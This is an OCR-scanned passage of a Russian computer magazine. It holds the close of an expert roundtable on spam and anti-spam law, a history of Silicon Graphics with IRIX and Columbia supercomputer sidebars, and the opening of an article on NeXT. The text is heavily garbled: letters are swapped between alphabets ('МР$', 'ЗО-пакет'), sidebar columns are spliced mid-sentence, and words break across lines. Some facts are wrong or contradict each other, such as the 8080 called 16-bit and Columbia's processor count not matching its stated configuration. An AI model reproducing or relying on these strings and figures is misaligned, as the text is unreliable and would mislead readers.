вителю (не получателю!) уведомление, что его письмо расценивается как спамерское и потому не 
доставляется. Но хороших манер придерживаются далеко не все серверы (точнее, их администра- 
торы). Причем, если недоставка личных писем обычно заканчивается на уровне простого недо- 
вольства, то в корпоративной сфере это сплошь и рядом приводит к убыткам, и притом весьма зна- 
чительным. К сожалению, выхода нет. Поскольку, даже определив для себя границу «спам/не 
спам», никак не могу воздействовать на политику серверов своих респондентов. Даже если я уста- 
новлю себе собственный почтовый сервер, это не решит проблемы, ведь фильтрация осуществля- 
ется с обоих концов. 


МАКСИМ ОРЛОВСКИЙ: Не пугает. Потому что процент информационного шума в сложных системах 
есть величина постоянная :). С усложнением систем возрастает и уровень шума. К нашему счастью (ли- 
бо печали), абсолютного оружия не существует — в ответ на новый метод «заспамливания» можно при- 
думать и защиту от него. Когда уровень спама в блогах и форумах будет мешать эффективной работе 
соответствующих сервисов, ИТ-сообщество неизбежно отреагирует созданием и внедрением новых 
способов защиты. 

МИХАИЛ ФИШМАН: Не пугает. Тематические форумы и блоги достаточно хорошо защищены от спа- 
ма, хотя бы той же проверкой e-mail'a при регистрации и картинкой для верификации, а крупные нете- 
матические форумы уже давно имеют свои блэклисты и большое количество модераторов. Намного 
острее проблема стоит в сетях обмена мгновенными сообщениями, например, в ICQ. Количество спама 
в таких сетях существенно растет, и пока не похоже, что у гигантов Instant Messaging'a получается 
справляться с этой тенденцией. 

ВАЛЕРИЯ КОМИССАРОВА: Не пугает. Это, во-первых, маловероятно. Во-вторых, решаемо. Если де- 
ло вдруг действительно начнет принимать такие масштабы — это затронет действительно всех (в том 
числе и тех, кому непосредственно спам выгоден). И, надеюсь, над проблемой действительно начнут 
серьезно работать. 

АНАТОЛИЙ СКОБЛОВ: Пугает. Ha aboutphone.info пришлось закрыть возможность постинга сообщений 
без авторизации. Помогло. Но сократилось количество общающихся. 

ЗАРАЗА: Блоги все-таки гораздо лучше защищены. Можно реализовать, например, защиту через 
САРТСНА. Если в случае почтового спама антиспамеры гоняются за спамерами, то тут наоборот. Спа- 
мер будет терять уйму времени, чтобы проспамить один блог. 

АЛЕКСЕЙ ЛУКАЦКИЙ: Я бы пошел еще дальше и отметил, что спамеры сейчас осваивают @$М. 
А проблема SMS-cnama гораздо серьезнее, так как на экране не помещается адресат смски, и ее при- 
ходится открывать в любом случае. А после внедрения технологий IP TV не исключаю возможности 
распространения видео-спама. Уже вошло в привычку, что все новые технологии используются не 
только по прямому назначению, но и с другими целями. Так что «волков бояться — в лес не ходить». 
МИХАИЛ ФЛЕНОВ: В нашей стране столько всего происходит, что вообще жить страшно, а общать- 
ся в интернете — и подавно. Если не спамеры, то мейлбомберы или флудеры достанут. Бороться 
с этим очень сложно, а молчать тоже нельзя. Не вижу реального выхода из этой ситуации, потому 
что интернет — свободная зона, и некоторые индивидуумы пытаются превратить эту свободу в бесп- 
редел. Пугает многое, но все пройдет. Угроз в интернете было очень много, но мы пережили все и 
спам тоже переживем. 

КОНСТАНТИН ГАВРИЛЕНКО: Особо этого не замечаю. Видимо, из-за правильно настроенного 
Firefox'a для просмотра веб-контента и Мса для общения. Что касается форумов, то при наличии гра- 
мотного и не ленивого админа, следящего за контентом, а также процедуры регистрации участников, 
отсекающей ботов, проблема форумного спама уходит. Хотя, может, просто форумы такие попадаются, 
неинтересные для спамеров :). 

INSIDEPRO: Совсем не пугает. Так как автоматическую рассылку спама через форумы и блоги запре- 
тить очень легко. Можно написать свой движок форума со своей страницей регистрации, формат кото- 
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рой не будет известен ни одному спам-боту. А можно вполне эффективно защитить и популярный фо- 
рум от спама. К примеру, несколько месяцев назад столкнулся с ситуацией, когда на форуме моего 
сайта стало появляться много спама. Движок форума имеет встроенную защиту от спама в виде кар- 
тинки с цифрами, которые надо ввести при регистрации на форуме, но, очевидно, код для распознава- 
ния этих символов давно уже написан и интегрирован в софт для рассылки спама на форумы. Реше- 
ние, в результате которого спам на форуме пропал полностью и не появляется уже много месяцев, бы- 
ло найдено очень быстро — на страницу регистрации форума было установлено дополнительное текс- 
товое поле с просьбой ввести в нем слово «Russia». Откуда знать спам-ботам, что именно на ЭТОМ 
форуме надо дополнительно вводить именно ЭТО слово? Ведь ручной проверки результатов спам- 
рассылки пока нет, а если даже и будет, то что мне мешает заменить слово «Russia» на слово 
«Moscow»? Или же вообще случайно выбирать слово из БД: каждый день — разное слово. Вариантов 
очень много, поэтому на данный момент спам на форумах и блогах, рассылаемый автоматически, 
можно отсекать достаточно легко. А вот с рекламой, добавляемой вручную, бороться гораздо слож- 
нее. Но варианты все же есть... 

АНТОН КАРПОВ: Действительно, такие предпосылки есть. И если форумы и блоги защищаются прове- 
ренными методиками вроде CAPTCHA, а также административными мерами (запрет на постинг незаре- 
гистрированным пользователям), то службы обмена сообщениями (например, Jabber) пока никак He за- 
щищены, но и не пользуются интересом у спамеров. Вероятно, только из-за сравнительно слабой расп- 
ространенности. 

КРИС КАСПЕРСКИ: С тех пор как интернет из деревни превратился в мегаполис, с помощью него уже 
никто полноценно не общается. Блоги являются деградировавшей мутацией телеконференций, чья си- 
ла была в их централизованной структуре и, как следствие, огромной аудитории. Блоги скорее напоми- 
нают посиделки на кухне, и защитить их от нежелательных сообщений очень просто, например, путем 
премодерации. Собственно говоря, остальные блоги и читать не стоит из-за обилия идиотов, захламля- 
ющих блог совершенно бессмысленными сообщениями почище всяких спамеров. 


МАКСИМ ОРЛОВСКИЙ: Самый эффективный способ борьбы с правонарушениями — лишение спаме- 
ров мотивации спамить. Законы и кодексы, как известно, на этом пути — не лучший инструмент. Спам 
будет существовать до тех пор, пока, с одной стороны, он будет приносить прибыль, а с другой, будут лю- 
ди, готовые за копейки тратить свое время на его рассылку и создание инструментов для работы с ним. 
МИХАИЛ ФИШМАН: То, что в России начинает появляться законодательная база по таким вопросам — 
это уже очень хорошо. Плохо только то, что это абсолютно бесполезно. Существует Уголовный кодекс 
и судебная система, однако преступления все равно совершались, совершаются и будут совершаться. 
Та же ситуация и со спамерами — их будут периодически ловить и даже, возможно, наказывать. Но ко- 
личество спама от этого не уменьшится, так как «свежие» спамеры будут появляться на месте «удален- 
ных с поля боя» . 

ВАЛЕРИЯ КОМИССАРОВА: Правовые меры воздействия в качестве законодательных актов неэф- 
фективны — подписывать законопроекты бессмысленно. Необходимы «полуофициальные» методы 
воздействия, с уголовной, конечно, ответственностью. Отслеживание, логи, работа с провайдерами... 
АЛЕКСЕЙ ЛУКАЦКИЙ: Пока не будет жестких уголовных мер (а их вряд ли примут), проблема спама 
не решится. У наших законодателей есть более насущные задачи, чем борьба со спамом. Достаточно 
интересны решения операторского класса, которые позволяют блокировать массовые рассылки путем 
контроля числа сообщений, посланных одним пользователем за единицу времени. Но операторы пока 
не «бегут» устанавливать такие решения, так как со стороны заказчиков нет еще вала запросов на та- 
кие услуги. Люди привыкли к электронному спаму, также как и к бумажному спаму в своих обычных 
почтовых ящиках. 

МИХАИЛ ФЛЕНОВ: Дубина и реальные сроки в не столь отдаленных местах. Законы приняли, а реаль- 
но пока ничего не сделали и не будут делать, потому что все решают деньги. И мало кого волнуют обыч- 
ные пользователи Сети. Когда спамеров реально накажут, вот тогда и станет лучше. Только нужно на- 
казывать всех подряд, а не запугивать парочкой показательных процессов. 

КОНСТАНТИН ГАВРИЛЕНКО: Есть, и очень даже действенные, как показал случай с «Центром анг- 
лийского разговорного языка». Но если серьезно, то принятия одного закона мало. Необходимы 
опытные кадры, способные довести дело до суда. Несколько показательных процессов, и охота к спа- 
мингу отпадет. 

АНТОН КАРПОВ: Как только примут поправку, разрешающую физическое уничтожение спамеров, 
я первым возьму в руки пулемет :). Мне кажется, что правильный путь — не в воздействии на спамеров, 
а в повышении эффективности методов и технологий защиты от них. Когда все научатся адекватно 
и грамотно защищаться, спамерское дело станет просто невыгодным, и спамеры отомрут сами собой. 
КРИС КАСПЕРСКИ: Закон лишь создает правовую основу, но нет такого закона, который нельзя обой- 
ти. Ведь оставляя свое мыло на публичных серверах, мы теряем право на приватность и уже не можем 
говорить о том, что какие-то сообщения являются «незапрошенными» © 
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Если в России самая распространенная марка машин — ВАЗ, то это совсем 

не значит, что других авто у нас не производят. Та же ситуация складывается 

и в мире компьютеров: если большинство людей знает такое название, Kak РС, 
то это не значит, что других компьютеров нет. Кроме х86 существуют Мас, 
ALPHA, SGI и многие другие. Да, они менее распространены, да, чаще всего 
их удел — узкий круг профи, специалистов в какой-то области, в которой эти 
машины выигрывают у всех остальных. Но знать о них нужно хотя бы потому, 
что история их появления, развития и иногда угасания весьма поучительна 

и интересна. Поэтому, после прочтения нашего SPEC Topic'a, слова NEXT 

и Silicon Graphics перестанут быть для тебя тайной, и ты убедишься, 

что ДНК есть не только у людей. 
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ИСТОРИЯ НАЧАЛАСЬ В 1979 ГОДУ С ИННОВАЦИОННОЙ 
АКАДЕМИЧЕСКОЙ РАЗРАБОТКИ «ГЕОМЕТРИЧЕСКОГО 
ДВИЖКА» (GEOMETRY ENGINE), КОТОРУЮ ПРОФЕССОР 
ДЖЕЙМС КЛАРК ВЕЛ С0 СВОИМИ СТУДЕНТАМИ 
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> рождение легенды. Идею разработки оценили 
и акулы венчурного капитала, которые выделили 
серьезные деньги на развитие созданной профессо- 
ром в 1981 году компании Silicon Graphics, Inc. Кларк 
вместе со своими ассистентами и аспирантами ухо- 
дит из университета в собственную контору и про- 
должает свои разработки уже под коммерческой 
крышей. Для реализации концепции Geometry 
engine в виде коммерческого продукта, безусловно, 
требовалась и аппаратная составляющая. По причи- 
нам, известным лишь профессору и его инвесторам, 
он не стал искать партнеров среди крупных компью- 
терных вендоров, а принял решение наряду с соф- 
том освоить еще и производство компьютеров под 
собственной торговой маркой. 

Ранние модели железных коней SGI носили 
в себе сердце производства компании Моторола — 
32-битный С!5С-процессор 68k. Стоит заметить, что 
на персоналках в те времена (начало 80-х!) прави- 
ли бал шестнадцатиразрядные камни 18080 oT Intel. 
Превосходство не ограничивалось разрядностью — 
поддержка 16 Мб ВАМ по сравнению с 1 Мб для 
18080, прогрессивная архитектура, позволяющая 
более эффективно использовать память, а также 
выполнять большее количество инструкций за один 
такт. Эти факторы позволили машинам от SGI по- 
лучить беспрецедентную производительность при 
размерах обычной персоналки. Безусловно, анало- 
гичное аппаратное обеспечение использовалось и 
в других Утх-станциях, например, от НР или DEC. 
И здесь решающим фактором, который на многие 
годы вывел Силиконов в лидеры графических ре- 
шений, стало программное обеспечение. 


Несмотря на то, что первые силиконовые 
компьютеры IRIS 1000/1200 были всего лишь графи- 
ческими терминалами для монстра VAX (мейнфрейм 
от Digital), модель из следующей линейки IRIS 3130 
стала независимой и вооруженной до зубов Unix- 
станцией. Вооружение составляли два 300 Мб вин- 
честера, стример (других портативных средств хра- 
нения попросту не было) и десятимегабитная сетевая 
карта Ethernet. Несмотря на это, мощности моторол- 
ловских камней уже не хватало, и рынок требовал 
новых более производительных решений. 

Вте же самые времена, когда профессор Кларк 
оставил свой университет для воплощения своих 
идей в железе и софте SGI, Джон Хэннеси разраба- 
тывал совершенно новую процессорную RISC-apxu- 
тектуру МР$. Ее особенностями были длинные по 
тем временам конвейеры с практически полным от- 
сутствием блокировок. Несмотря нато, что малое ко- 
личество блокировок в конвейерах не позволяло вы- 
полнять сложные инструкции, возможность работать 
на высоких тактовых частотах компенсировала этот 
недостаток и позволяла их эмулировать. По прошест- 
вии трех лет разработка созрела для промышленной 
реализации, и Хэннеси также покидает университет 
ради собственного детища — основанной им компа- 
нии MIPS Technologies. Оригинальная концепция ра- 
боты с памятью позволила снять с CPU большую 
часть нагрузки по обеспечению взаимодействия пе- 
рифериийных устройств с памятью — они обращают- 
ся к ней самостоятельно, получив в распоряжение 
от процессора определенный ее сегмент. Удачная 
идеология архитектуры MIPS как нельзя лучше под- 
ходила для реализации затей инженеров SGI, и воп- 
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рос о TOM, кто будет поставлять процессоры для их 
компьютеров, был решен на многие годы вперед. 

Переход на новые процессоры вкупе с ис- 
пользованием в качестве операционки собственно- 
го диалекта UNIX System V Release 4 позволили 
SGI к середине 80-х на равных соперничать с Sun, 
крупнейшим игроком на рынке УМХ-станций. 

В течение следующих нескольких лет рабочие 
станции Silicon Graphics получили в свое распоря- 
жение $С$|-интерфейс, 32-разрядные шины — 
EISA с программным Plug-n-play для подключения 
внутренних устройств/плат расширения (скорость 
обмена данных — 32 Мб/сек) и графическую шину 
GIO (скорость — 133 Мб/сек). Пропускная способ- 
ность системной шины достигала 400 Мб/сек. Для 
закрепления своего победоносного шествия SGI со- 
вершает ряд приобретений — в 1989 году со всеми 
потрохами был проглочен поставщик процессоров 
MIPS Technologies. Затем силиконовцы прикупили, 
ни много ни мало, двух из имеющихся на тот мо- 
мент на рынке трех производителей профессио- 
нальных программ для работы с 3D (Alias и 
Wavefront). Третьего же игрока, Softimage, неожи- 
данно для всех чуть позже прибрал к рукам один 
распоясавшийся софтверный монополист. 

Между тем, на фоне общего подъема компа- 
нию покидает ее основатель, Джеймс Кларк. По тем 
же причинам, что побудили сделать в свое время 
аналогичный шаг и Стива Джобса — отсутствие 
взаимопонимания с руководящим составом. Также, 
как и Джобс, Кларк не стал сидеть сложа руки — 
им был основан стартап под названием Netscape, 
бросивший вызов самому Microsoft. 
> — комуэто нужно? К началу последнего десяти- 
летия двадцатого века гегемония SGI на рынке про- 
фессиональных графических станций стала оче- 
видной. Модели SGI от Iris 4D до SGI Indy стали стан- 
дартом в индустрии производства спецэффектов 
для кино и визуализации различных природных 
процессов. Живность «Парка Юрского периода», 
робот из жидкого металла и все прочее в «Терми- 
наторе-2», спецэффекты для «Бездны» и многих 
других фильмов в период с середины восьмидеся- 
тых по середину девяностых были созданы именно 
на этих машинах. Более поздние фильмы — «Арма- 
геддон» и «Властелин колец» также щеголяли спец- 
эффектами, созданными с помощью станций 
SGI (это были уже более тяжелые решения для рен- 
деринга). Несмотря нато, что компьютеры этой кон- 
торы известны широким массам благодаря исполь- 
зованию в кино и телевещании, эти отрасли были 
далеко не единственными сферами их применения. 

В концепцию «Визуального компьютинга» от- 
лично вписывались медицина, микробиология, про- 
ектирование, геология и военное дело. Там, где тре- 
бовалась визуализация происходящих в реальном 
времени процессов, конкурентов решениям от SGI 
не было. Большим успехом пользовались системы 
и уконструкторов благодаря наличию на этой плат- 
форме САО-/САМ-приложений. Буржуйским летчи- 
кам хорошо знакомы тренажеры, сравнимые по 


своей реалистичности с настоящими самолетами, и 
заслуга этого, как нетрудно догадаться, в системах 
визуализации SGI. Не исключено, что аналогичные 
тренажеры используются и при подготовке пилотов 
гражданской авиации в России, однако факты инс- 
талляции таких систем мне не известны. 

В стране родных осин компьютеры веселых 
голубых, зеленых и фиолетовых расцветок исполь- 
зуют, в первую очередь, аниматоры и студии виде- 
опроизводства. Из известных хотелось бы отметить 
российских грандов «Пилот» и BS Graphics. Во вре- 
мена, предшествующие кризисному 1998 году си- 
ликоновские станции охотно приобретались нефтя- 
никами и метеорологами, но в силу дороговизны 
как собственно компьютеров, так и софта, широко- 
го распространения у нас они так и не получили. 
> = начало конца. К середине прошлого десятиле- 
тия бизнес SGI принял современный вид и офор- 
мился в четыре основных направления: програм- 
мное обеспечение, рабочие станции и системы ви- 
зуализации графических данных, серверы, a также 
системы хранения данных. Несмотря на прочные 
позиции на рынке, дела у силиконовцев пошли из 
рук вон плохо — курс акций уходил в крутое пике, 
убытки множились с каждым кварталом. Компания 
лихорадочно искала пути к выживанию ив 1997 го- 
ду сделала ряд шагов, действительно обескуражив- 
ших приверженцев ее продуктов. 

Во-первых, жемчужина SGI — интерфейс 
OpenGL был лицензирован Microsoft как «дополня- 
ющая технология к Ойес{30» в рамках разработки 
DirectX. Во-вторых, было объявлено о переносе 
Maya в среду Windows МТ, что подрывало монопо- 


лию IRIX на этот, без сомнения, лучший ЗО-пакет. 
Дочерняя контора Alias|Wavefront в дальнейшем pe- 
ализовала эти обещания и пошла еще дальше — 
выпустила Windows-Bepcun пакетов Studio и Design 
Studio. В третьих, были анонсированы и сами рабо- 
чие станции, построенные на процессорах Intel и ра- 
ботающие под той же МТ. В довершение всего, спус- 
тя три года компания провела реорганизацию МР$ 
Technologies, большая часть которой была выделе- 
на в самостоятельное предприятие и пущена в сво- 
бодное плавание. Надо отметить, что производство 
и разработку процессоров для рабочих станций 
и серверов силиконовцы все же оставили при себе, 
отправив бывшую дочку пробивать дорогу МР$-ре- 
шениям на вертикальных потребительских рынках. 

Очевидно, что эти шаги были продиктованы 
растущей конкуренцией как со стороны Intel, 
так и вездесущей Microsoft, которая в свое время 
сделала финт ушами, приобретя Softimage и прек- 
ратив производство одноименного ЗО-пакета в вер- 
сии для IRIX. Нам, не будучи крупными финансиста- 
ми и управляющими, сложно судить, насколько уг- 
розы, исходящие от этих двух гигантов были опас- 
ными, и действительно ли им нечего было противо- 
поставить со стороны SGI... Факты остаются факта- 
ми: создатели платформы MIPS/IRIX сами стали за- 
бивать гвозди в ее гроб, что привело к быстрому 
«сливу» с нее разработчиков и миграции их в пер- 
вую очередь на Windows. В течение нескольких лет 
платформа растеряла практически всех софтвер- 
ных вендоров от Adobe до Descreet. 

Конец девяностых в технологическом плане 
был ознаменован созданием легендарных рабочих 


АРИСТОКРАТ 
СРЕДИ 
АРИСТОКРАТОВ 


ма XFS была выпущена под лицензией 

GNU GPL и получила распространение 

в отдельных дистрибутивах Ипих. 
Работа в системе может вестись как 


ся в небольшую квадратную пиктограм- 
му прямо на рабочий стол. К сожале- 
нию, таких красот, как с функцией 
Ехрозе на Маке тут не предусмотрено, 


IRIX — полноценная УМХ-система, ос- 
нованная на System V Release 4. В нас- 
тоящий момент представляет собой 
полностью 64-битную OC. Файловая 
система поддерживает файлы разме- 
ром до 9 Тб и тома до 18 миллионов Тб. 
Система изначально была ориентиро- 
вана на работу с огромными файлами и 
серьезными потоками данных как внут- 
ри машины, так и при их передаче 
по Сети. В 2000-м году файловая систе- 


в стандартном для UNIX терминале, 
так и в графическом интерфейсе. Гра- 
фическая оболочка IRIX Interactive 
Desktop представляет собой оконный 
интерфейс, знакомый всем и каждому, 
но и отличия от прочих операционок, 
безусловно, имеются. На рабочем сто- 
ле присутствует системное меню 
Toolchest, дальний родственник кнопки 
«Пуск», в котором сгруппированы уста- 
новленные программы, системные ути- 
литы и часто используемые функции 
вроде очистки корзины, которая здесь 
называется dumpster. При подключе- 
нии ккомпьютеру устройства ввода ме- 
диа-данных, будь то камера или микро- 
фон, на десктопе появляются соответ- 
ствующие иконки, при нажатии на кото- 
рые открываются соответствующие 
приложения для записи аудио/видео. 
Поскольку здесь нет ни дока, 
как в Мак ОС, ни панели задач, как 
в Виндах — приложения сворачивают- 


и вместо текущего содержимого пик- 
тограмму свернутой программы укра- 
шает ее иконка. Отдельно хотелось бы 
отметить, что иконки в системе пол- 
ностью векторные, что позволяет их 
масштабировать без появления арте- 
фактов. Мелочь — а приятно. 

Операционка отлично работает в ге- 
терогенных сетях при помощи Samba 
и/или AppleTalk. Поскольку ее разра- 
ботчики одновременно являются раз- 
работчиками OpenGL, надо ли говорить 
о том, что поддержка реализована вы- 
ше всяческих похвал? 

Последняя версия системы — 
6.5.30. Почему последняя, а не теку- 
щая? В то время, когда ты читаешь эти 
строки, службы доставки уже будут 
развозить остатки действительно пос- 
ледних дистрибутивов IRIX их покупа- 
телям. Компания SGI официально объ- 
явила об окончании продаж этой OC 
с 29 декабря 2006 года. 


73 


SGI ONYX 


просчитывает 
сцены очередной 
голливудской киноподелки 


FUEL (справа) 
последний из могикан 


станций Octane и О2 (спецы прозвали его «тосте- 
pom» за поразительное сходство и небольшие раз- 
меры), успешно работающих и по сей день. Тяже- 
ловесы профессиональной графики Опух и серве- 
ры Origin расхватывали как горячие пирожки, стро- 
ились суперкомпьютеры, многие из которых все 
еще находятся в числе двадцати «Силиконов» 
из престижного «Топ-500»... Но в то же самое вре- 
мя уже производились компьютеры SGI с немощ- 
ными мозгами в виде «третьих пней», работающие 
под управлением Windows-2000 и возвещающие 
о скорой кончине платформы MIPS/IRIX. 

Здесь трудно удержаться и не провести анало- 
гии между Apple и SGI — в середине 90-х обе компа- 
нии были в глубоком кризисе, каждая испытывала на 
свою платформу серьезное давление со стороны 
альянса Intel/Microsoft. Несмотря на то, что они нахо- 
дились в разных рыночных зонах, их роднило нали- 
чие собственной архитектуры, ОС и стойкой армии 
(нет, не клиентов) фанатов. Нужно признать, что «яб- 
лочникам» удалось выйти из этой битвы с наимень- 
шими потерями — да, сейчас в их компьютерах сто- 
AT сплошь камни от Intel, но все же Макинтош как 
платформу им сохранить удалось. Возможно, прои- 
зошло это потому, что Мак вытаскивал из болота 
лично крестный отец-основатель, вернувшийся в ло- 
но родной конторы, в то время как Джеймс Кларк 
наблюдал за проблемами своего детища со стороны. 
А может быть, на это были и совсем другие причины. 
> — настоящее и будущее SGI. Современная ры- 
ночная концепция SGI представляет собой попытку 
сохранить былое влияние на рынке профессиональ- 
ных систем по визуализации и обработке графики 


с одной стороны и производства топовых сервер- 
ных решений с другой. Компания провозгласила 
проведение двухплатформенной политики, пытаясь 
усидеть на двух стульях с надписями «MIPS» 
и «intel». Несмотря на это, многие ожидают сверты- 
вания производства компьютеров на базе МР$ 
вслед за отказом от развития операционной систе- 
мы IRIX. По всей видимости, компьютеры Tezro 
и Fuel станут последними системами на базе этой 
увядающей компьютерной архитектуры. 

После обращения компании SGI в мае прош- 
лого года к американским властям об инициирова- 
нии процедуры финансового оздоровления и защи- 
ты от кредиторов, отдельные аналитики связывали 
возможное будущее Silicon Graphics с Aplle, о чем 
судачили и десять лет назад во времена, трудные 
для обеих компаний. Самые горячие головы усмот- 
рели символизм в том, что объявление о банкрот- 
стве было сделано спустя три дня со дня продажи 
Стивом Джобсом студии Pixar Диснею. Однако до- 
мыслы остались домыслами, и выбираться из дол- 
говой ямы силиконовцам пришлось самим. Сейчас 
самые трудные времена компании позади, и в фи- 
нансовом тоннеле у них наконец-то забрезжил свет. 

Сейчас для платформы доступен самый разно- 
образный коммерческий софт, однако большая его 
часть морально устарела и не поддерживается про- 
изводителями. Последняя гордость платформы, па- 
кет Мауа, обновился в этом году до версии 6.5, одна- 
ко это вызвало мало радости в стане силиконопок- 
лонников — вместе с релизом разработчиками было 
объявлено о прекращении поддержки этой платфор- 
мы и сосредоточении усилий на разработке версий 
для Windows, Linux и Мас OS. Таким образом, един- 
ственным поддерживаемым ЗО-пакетом на IRIX ос- 
тается лишь Вепаег. Прочие игроки прекратили под- 
держку этой ОС еще несколько лет назад. 

Аналогичная ситуация и на рынке программ 
для монтажа и композитинга. Несмотря на то, что 
линуксовые версии Tex же Flame, Flint etc. все еще 
уступают по производительности предыдущим вер- 
сиям для IRIX (не в последнюю очередь благодаря 
аппаратным и архитектурным особенностям стан- 
ций SGI), назад пути нет. Безусловно, специалисты 
по инерции еще будут использовать в своей работе 
IRIX, но приход на ее место наглого пингвина — 
лишь вопрос времени. 

Все это не означает конца SGI как компании- 
производителя компьютеров. Генеральный курс на 
Linux рука об руку с Intel — это новая идеология ком- 
пании, способная вывести ее из кризиса, но не га- 
рантирующая возрождения былого ее величия. 
Silicon из чисто софтверной по духу (вспомним 
«Графический движок» — собственные компьюте- 
ры понадобились Кларку лишь для получения воз- 
можности запускать его) инновационной кампании 
превращается в рядового железячного вендора, 
пусть и слегендарным прошлым. Пройдет еще нес- 
колько лет, и уже ни у кого не повернется язык наз- 
вать их продукцию культовой. Обыденным вещам 
среди идолов места нет © 


ПРОЕКТ 
«КОЛУМБИЯ» 


Серверные решения от SGI не так широко 
известны, как знаменитые рабочие станции Indigo 
или Octane. Несмотря на это, силиконовские 
инженеры-проектировщики числодробилок щи 
лаптем не хлебают. На базе их железа собрано 
немало мощных систем, многие из которых 
отметились в суперкомпьютерном топ-500. Самым 
знаменитым из них, наверное, является проект 
«Колумбия», к настоящему времени занимающий 
восьмое место в табели о рангах самых мощных 
компьютеров планеты. Суперкомпьютер 
конструктивно выполнен в виде кластера 

из двадцати 512-процессорных систем SGI Altix 
512 и показывает пиковую производительность 

в 59,5 тфлоп. На борту находятся 1160 
процессоров Intel Itanium 2, работает все 
хозяйство под управлением Linux. В отличие от 
аналогичных машин, порою собираемых годами, 
этот титан суперкомпьютерной мысли был 
просторен всего за 15 недель. 


74 СПЕЦ-ТОР!С СПЕЦ 


01-07 


next 
please! 


ПРОВАЛ КОМПЬЮ 
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TEPA APPLE LISA И ДРУГИЕ БОЛЕЕ 


НАЗВАНИЕМ — NEXT COMPUTER. 
ЛУ, «СЛЕДУЮЩИЕ КОМПЬЮТЕРЫ» 
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РИМ, ЧТО ИЗ ЭТОГО ПОЛУЧИЛОСЬ 
Владимир Синельников 
Vlad@onthefly.ru 


> = старт-ап. Джобс, будучи у руля Apple, основа- 
тельно изучил и освоил весьма перспективный для 
продаж компьютеров образовательный рынок. Про- 
анализировав опыт продаж Макинтошей и их стар- 
ших братьев — Упх-станций, он сделал справедли- 
вый вывод: первые были недостаточно мощными, 
а вторые были слишком дорогими. Родилась строй- 
ная и перспективная концепция — создать компью- 
тер, не имеющий этих недостатков. Серьезное вли- 
яние при его создании оказал на Джобса известный 
биохимик Пол Берг, профессор Стэндфордского 
университета, лауреат Нобелевской премии. Берг 
посоветовал Стиву разработать компьютер, пригод- 
ный для моделирования различных биохимических 
опытов и реакций, что позволило бы его универси- 
тету сократить расходы на содержание реальных 
лабораторий. Ведь многие опыты можно было бы 
проводить на экране компьютера без использова- 
ния дорогущего научного оборудования. По замыс- 
лу Берга и Джобса, такая машина должна была со- 
держать в себе «Три Мега» — мегабайт памяти, 
мегапиксельное экранное разрешение и мегафлоп- 
ную производительность. 

После серии консультаций с Бергом и други- 
ми влиятельными университетскими деятелями 
концепции вылились в спецификации будущего 
компьютера. Для их реализации Джобс, используя 
свое влияние и «административный ресурс», пере- 
манил из Apple несколько талантливых и сумасб- 
родных инженеров, разделявших его взгляды 
и бывших его горячими поклонниками. Первые ин- 
вестиции им удалось привлечь, выступив в амери- 
канском телевизионном шоу «Антрепренеры». 
Миллиардер Росс Перо, сражавшийся с Бушем- 
старшим и Биллом Клинтоном в 1992 на президент- 
ских выборах, настолько проникся их оптимизмом, 
что немедленно решил раскошелиться на восьмиз- 
начную сумму. 

Не будучи ограниченным в финансах, Джобс 
дал старт разработке компьютеров. Возглавил кол- 
лектив девелоперов Рич Пейдх, под началом кото- 
рого в свое время был создан компьютер Apple Lisa. 
В то время как инженеры трудились над проектиро- 
ванием компьютера, Джобс ангажировал для учас- 
тия в проекте известных дизайнеров. Пол Рэнд соз- 
дал для Next логотип и фирменный стиль, а культо- 
вая студия промышленного дизайна Frogdesign взя- 
лась за внешний вид новых компьютеров. 

Спустя год с момента старта проекта по раз- 
работке «Следующего компьютера» стало ясно, 
что имеющиеся на рынке операционные системы 
по разным причинам не вписываются в концепцию 
«Трех Мегов», и Джобсу приходится корректиро- 
вать планы по его строительству. Вместе с хард- 
верным бизнесом в стенах компании появляется 
и софтверный — было решено писать свою опера- 
ционку на базе известного ядра Mach. Не разме- 
ниваясь по мелочам, руководство Next приглаша- 
ет на пост руководителя этого направления гран- 
да UNIX-cuctem Ави Теваняна из университета 
Карнеги-Меллон. 
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m Первый в мире 
веб-сервер 
на NeXTcube 
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Рабочий стол разработчика «Кваки» (редактор уровней) 


> дети капитана Джобса. В 1988 году увидел 
свет первый из «Следующих», компьютер NeXTcube. 
Он был построен на популярном в 80-е процессо- 
ре 68К и обладал восемью мегабайтами оперативной 
памяти, винчестерами на 10-40 Мб, флопиком, ши- 
ной NuBus на материнской плате для карт расшире- 
ния, сетевой картой Ethernet и даже магнитооптичс- 
ким приводом Canon емкостью 256 Мб и, опциональ- 
HO, односкоростным внешним приводом CD-ROM 
производства Sony. Вместе с компьютером постав- 
лялся 17" монохромный монитор с разрешением 
1120х832 пикселов. Представление компьютера нес- 
колько раз откладывалось в течение полугода и ког- 
да оно, наконец, произошло, журналисты поинтере- 
совались, почему произошла задержка? На что не- 
возмутимый босс NeXT Стив Джобс ответствовал: 
«Какая еще задержка? Этот компьютер опережает 
свое время на пять лет!». 


И он действительно опережал его: кроме пе- 
редовых приводов от Зопу и Сапоп, машины 
от NeXT'a комплектовались клавиатурами, на KOTO- 
рых имелись кнопки управления питанием, яр- 
костью монитора и громкостью звука. Такие воз- 
можности появились лишь спустя несколько лет 
на компьютерах Макинтош, а на банальных ПиСи 
чуть ли не десять лет спустя. Звук на «Следующих» 
компьютерах был на редкость качественным бла- 
годаря присутствию специального О$Р-процессо- 
ра, выполнявшего задачи по его обработке. 
Для воспроизведения звука можно было приобрес- 
ти Soundbox, который являлся вовсе не прозаичной 
«компьютерной колонкой», а представлял собой 
самый настоящий аудиоинтерфейс для воспроиз- 
ведения и записи (!) звука. 

Кубические компьютеры пришлись по вкусу 
ученым и студентам и благодаря маркетинговому 


СВОБОДНАЯ 
ИНКАРНАЦИЯ 
OPENSTEP 


Gnustep — это среда разработки или, 
как сейчас модно говорить, фреймворк 
созданный по спецификациям среды 
Openstep. Представляет собой кросс- 
платформенный набор библиотек Ob- 


jective-c, ммаде{-инструментария и ути- 
лит разработки интерфейсов для UNix- 
подобных операционных систем и М$ 
Windows. Распространяется по лицен- 
зии GNU GPL. В мире Linux отдельные 
ренегады прочат Gnustep (Windows Ма- 
ker) в конкуренты титанам KDE/GNOME 
в силу его меньшей требовательности 
к вычислительным ресурсам. В бли- 
жайшем будущем разработчики обе- 
щают добавить поддержку интерфейса 
Apple Cocoa, что значительно облегчит 


портирование софта с Макинтош на Li- 
пихи Windows. 


таланту Джобса начали неплохо продаваться. Кон- 
цепция «Трех Мегов» показала свою жизнеспособ- 
ность на практике, и компания взялась за разра- 
ботку еще одной линейки «Следующих». К этому 
времени были проанализированы недостатки как 
аппаратной части «кубиков», так и их слабые мар- 
